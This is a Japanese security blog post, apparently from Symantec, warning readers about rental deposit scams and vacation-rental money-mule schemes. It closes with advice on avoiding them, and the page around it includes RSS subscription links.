  • ウイルス対策定義、オペレーティングシステム、ソフトウェアを最新の状態に保つ。
  • 電子メールやメッセージサービス、ソーシャルネットワークで送られてきたリンクがどんなに魅力的でも不用意にクリックしない。
  • ファイルは、信頼できる正規のソースだけからダウンロードする。

* 日本語版セキュリティレスポンスブログの RSS フィードを購読するには、http://www.symantec.com/connect/ja/item-feeds/blog/2261/feed/all/jaにアクセスしてください。

 

 

新年の新居探しを狙う昔ながらの詐欺

0
0

新しい年が始まりました。多くの人がまだ新年の抱負を抱き続けている時期でしょう。今年こそ運動しようとか禁煙しようという定番のほか、新しいアパートを探そうと計画している方もいるかもしれません。ただし、それは賃貸の手付金詐欺広告も増えるということなので、新居を探すときには注意が必要です。

賃貸の手付金詐欺広告は、ほとんどの国で、ほぼあらゆるプラットフォームで見受けられます。広告はどれも本格的ですが、中には正規のサイトから実際の広告をコピーしてきたものもあります。こうした広告が、定評あるアパート賃貸サイトやオンラインの掲示板、B & B(朝食付き宿泊)の紹介サイト、ときには新聞の三行広告欄にも出現するようになっています。Web サイトの所有者は、偽広告を検出し、できるだけ速やかに削除しようと全力をあげていますが、削除しきれずに新しい広告が出回るケースは後を絶ちません。

この詐欺はいたって単純です。ユーザーが少しでも賃貸物件に興味を示すと、大家と称する人物から連絡が届きます。今は旅行中なので物件を直接お見せすることはできないが、預かり保証金を送ってもらえれば鍵を送るというのです。もちろんこれは典型的な手付金詐欺であり、たいていは銀行からの通常の電信送金とは違う方法で支払いを求めてきます。被害者が送金したとたん、詐欺師は手付金を持って行方をくらまし、二度と姿を現すことはありません。アパートの鍵が届くことはなく、そもそもそんな物件が存在したかどうかさえ怪しくなります。ときには、実際に鍵を送ってくる詐欺師もいますが、被害者が検討しているアパートにその鍵は合いません。おそらくこれも、アパートに合わない鍵だと被害者が気付くまでに足跡を断とうとする時間かせぎの手口でしょう。

また、身元調査を装って被害者の個人情報やパスポート写真を集め、それを悪用して被害者になりすまそうとする詐欺師もいます。

同じような詐欺は別の手口にも使われており、たとえば休暇用アパートのレンタル詐欺が頻発しています。こちらの手口の場合、詐欺師は大家ではなく、間借りに興味を持った人物を装います。細かい内容まで合意が進むと、詐欺師は電信送金を処理するためと称して銀行情報を聞き出そうとします。手口として、まず詐欺師は契約額より多くの金額を大家に送金します。このお金は、詐欺師の銀行口座から支払われたものではなく、実際には金融機関を狙うトロイの木馬によって乗っ取られたオンラインバンキングの口座から盗み出されたものです。送金が記帳されると大家は連絡を受け、現在旅行中と称している詐欺師に宛てて他の手段で過剰分を返金するよう指示されます。数日経つと大家は、そのお金が盗まれたものであること、マネーミュール(送金仲介人)として動いたことになるので返金の義務があることを銀行から告げられます。

このように、貸す側でも借りる側でも常に警戒を怠らず、詳しい事情の確認が困難な場合でも可能なかぎりルールに従うよう必要があります。

  • 物件を実際に見るか、担当者に面会するまで、手付金は払わない。
  • 物件を見られず、担当者に会えない場合には、信頼できるエスクローサービスを利用する。
  • 別の住所に、または通常と違う送金方法を利用するときは十分に注意する。
  • 取引を急がず、プレッシャーにも屈しない。相手の売り込みが熱心すぎる場合には、何らかの不都合があると考えてよい。
  • 偽の取引で受け取った金銭は、必ずその送信元に返金する。
  • インターネットで、電子メールアドレスや広告の文面を検索してみる。すでに詐欺として報告例があるかもしれないからである。

* 日本語版セキュリティレスポンスブログの RSS フィードを購読するには、http://www.symantec.com/connect/ja/item-feeds/blog/2261/feed/all/jaにアクセスしてください。

Viewing all 5094 articles
Browse latest View live


Latest Images